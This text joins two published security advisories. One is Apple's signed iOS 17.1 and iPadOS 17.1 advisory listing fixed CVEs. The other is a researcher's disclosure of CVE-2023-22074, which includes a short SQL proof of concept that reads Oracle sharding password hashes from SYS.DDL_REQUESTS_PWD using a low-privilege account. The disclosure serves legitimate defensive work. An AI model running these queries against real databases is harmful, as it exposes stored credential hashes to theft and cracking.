    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-10-25-2023-1 iOS 17.1 and iPadOS 17.1iOS 17.1 and iPadOS 17.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT213982.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.ContactsAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to access sensitive user dataDescription: A privacy issue was addressed with improved private dataredaction for log entries.CVE-2023-41072: Wojciech Regula of SecuRing (wojciechregula.blog) andCsaba Fitzl (@theevilbit) of Offensive SecurityCVE-2023-42857: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)CoreAnimationAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to cause a denial-of-serviceDescription: The issue was addressed with improved memory handling.CVE-2023-40449: Tomi Tokics (@tomitokics) of iTomsn0wFind MyAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to read sensitive location informationDescription: The issue was addressed with improved handling of caches.CVE-2023-40413: Adam M.ImageIOAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing an image may result in disclosure of process memoryDescription: The issue was addressed with improved memory handling.CVE-2023-40416: JZIOTextEncryptionFamilyAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2023-40423: an anonymous researcherKernelAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An attacker that has already achieved kernel code execution maybe able to bypass kernel memory mitigationsDescription: The issue was addressed with improved memory handling.CVE-2023-42849: Linus Henze of Pinauten GmbH (pinauten.de <http://pinauten.de/>)Mail DraftsAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Hide My Email may be deactivated unexpectedlyDescription: An inconsistent user interface issue was addressed withimproved state management.CVE-2023-40408: Grzegorz RiegelmDNSResponderAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A device may be passively tracked by its Wi-Fi MAC addressDescription: This issue was addressed by removing the vulnerable code.CVE-2023-42846: Talal Haj Bakry and Tommy Mysk of Mysk Inc. @mysk_coPasskeysAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An attacker may be able to access passkeys withoutauthenticationDescription: A logic issue was addressed with improved checks.CVE-2023-42847: an anonymous researcherPhotosAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Photos in the Hidden Photos Album may be viewed withoutauthenticationDescription: An authentication issue was addressed with improved statemanagement.CVE-2023-42845: Bistrit DahlaPro ResAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2023-42841: Mingxuan Yang (@PPPF00L), happybabywu and Guang Gong of360 Vulnerability Research InstituteSiriAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An attacker with physical access may be able to use Siri toaccess sensitive user dataDescription: This issue was addressed by restricting options offered ona locked device.CVE-2023-41982: Bistrit DahlaCVE-2023-41997: Bistrit DahlaCVE-2023-41988: Bistrit DahlaStatus BarAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A device may persistently fail to lockDescription: The issue was addressed with improved UI handling.CVE-2023-40445: Ting Ding, James Mancz, Omar Shibli, an anonymousresearcher, Lorenzo Cavallaro, and Harry LewandowskiWeatherAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to access sensitive user dataDescription: A privacy issue was addressed with improved private dataredaction for log entries.CVE-2023-41254: Cristian Dinca of "Tudor Vianu" National High School ofComputer Science, RomaniaWebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing web content may lead to arbitrary code executionDescription: The issue was addressed with improved memory handling.WebKit Bugzilla: 259836CVE-2023-40447: 이준성(Junsung Lee) of Cross RepublicWebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing web content may lead to arbitrary code executionDescription: A use-after-free issue was addressed with improved memorymanagement.WebKit Bugzilla: 259890CVE-2023-41976: 이준성(Junsung Lee)WebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing web content may lead to arbitrary code executionDescription: A logic issue was addressed with improved checks.WebKit Bugzilla: 260173CVE-2023-42852: an anonymous researcherWebKit Process ModelAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing web content may lead to a denial-of-serviceDescription: The issue was addressed with improved memory handling.WebKit Bugzilla: 260757CVE-2023-41983: 이준성(Junsung Lee)Additional recognitionlibarchiveWe would like to acknowledge Bahaa Naamneh for their assistance.libxml2We would like to acknowledge OSS-Fuzz, Ned Williamson of Google ProjectZero for their assistance.Power ManagerWe would like to acknowledge Xia0o0o0o (@Nyaaaaa_ovo) of University ofCalifornia, San Diego for their assistance.VoiceOverWe would like to acknowledge Abhay Kailasia (@abhay_kailasia) of LakshmiNarain College Of Technology Bhopal India for their assistance.WebKitWe would like to acknowledge an anonymous researcher for theirassistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 17.1 and iPadOS 17.1".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmU5YlsACgkQX+5d1TXaIvo6xBAAz5wnchUVfj3YbZf3KoadrXFmkWVjtU6sme4ZgN2+gsX+oF1Cunxvx3N2lGG1dldfG+gmJ3nmtp9/hBCIMvBt5Bus3NdD2nuJ7IbLbP2YuUOrMX3FDPNB8UPE84d6wZ7B3VVKVxeUsaZzuDlMCvGySyaVelBTxEdDx6RjsHlOe0LWwqoQJ4rrUOO9wdBogsDpD4JNt++6UarA1f2+OC1mePdiI9e1t6OI+q92IOZu3/cGDda/rFoL/TpY+iC1n9qkyyEOj3anfFi6fjybQQK/XPYccv4iWdP2xi5nqKDQ95nYlnf2LmI6gMOWJutciLyLzqSI3eHY4cL99/NLpMI7UkgBRNHsNwH9d0mJlVyjIBtevJbWKDJl9iSH3LeZmeMV1x3WQ9JshGmDYvXWJ9cyppKHRsu5BLeMpzis6dmv3FD+sBbI7Or9REKahyYP0N8YfTGBcFoTa4r0tx1r51+Dy7uUbuMHDxRbXkTLRReEzmyXyxMC+HcEzLUAq0YWuGwR3kZ9x+mlBKBxj+/4dltzKWg8lxOTC733RR78/vsgbf1M3cFpibsubH0LhC9k7RXnV9AYexsEoasFtHuIQQPErTVJqWYYKi6knM34fn64reitK8224Cy6SXybo55ZsTVV+XRmuzppiOjMFXupcTUTozdmcyXwMaMKSJYAbkOXtLQ==iliY-----END PGP SIGNATURE-----

Apple Security Advisory 10-25-2023-1

Oracle database versions 19.3 through 19.20 and 21.3 through 21.11 have an issue where an account with create session and select any dictionary can view password hashes stored in a system table that is part of a sharding component setup.

Title: CVE-2023-22074 – Oracle database password hash exposure in sharding component  
Product:                   Database  
Manufacturer:              Oracle  
Affected Version(s):       19c,21c [19.3-19.20 and 21.3-21.11]  
Tested Version(s):         19c  
Risk Level:                Low  
Solution Status:           Fixed  
CVE Reference:             CVE-2023-22074  
Base Score:              2.4   
Author of Advisory:        Emad Al-Mousa

*****************************************  
Vulnerability Details:

Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Attacker compromising an account with create session and select any dictionary can view password hashes stored in a system table that is part of sharding component setup.

*****************************************  
Proof of Concept (PoC):

I will create an account called “jim” in pluggable database ORCLPDB1 and grant the account create session and select any dictionary privilege:

SQL> alter session set container=ORCLPDB1;

Session altered.

SQL> create user jim identified by jim123;

User created.

SQL> grant create session,select any dictionary to jim;

Grant succeeded.

I will now connect using database account “jim” and the account will be able to view the password hashes in system table DDL_REQUESTS_PWD used by database sharding component:

sqlplus "jim/jim123"@ORCLPDB1

SQL> show user  
USER is "JIM"  
SQL> select * from SYS.DDL_REQUESTS_PWD;

   DDL_NUM  PWD_BEGIN  
---------- ----------  
ENC_PWD  
--------------------------------------------------------------------------------  
       123        445  
E494684108560FFEF1C17CDE72F36A1A

*****************************************  
References:  
https://www.oracle.com/security-alerts/cpuoct2023.html  
https://nvd.nist.gov/vuln/detail/CVE-2023-22074  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22074  
https://databasesecurityninja.wordpress.com/2023/10/25/cve-2023-22074-oracle-database-password-hash-exposure-in-sharding-component/  
https://github.com/emad-almousa/CVE-2023-22074

Tag

#auth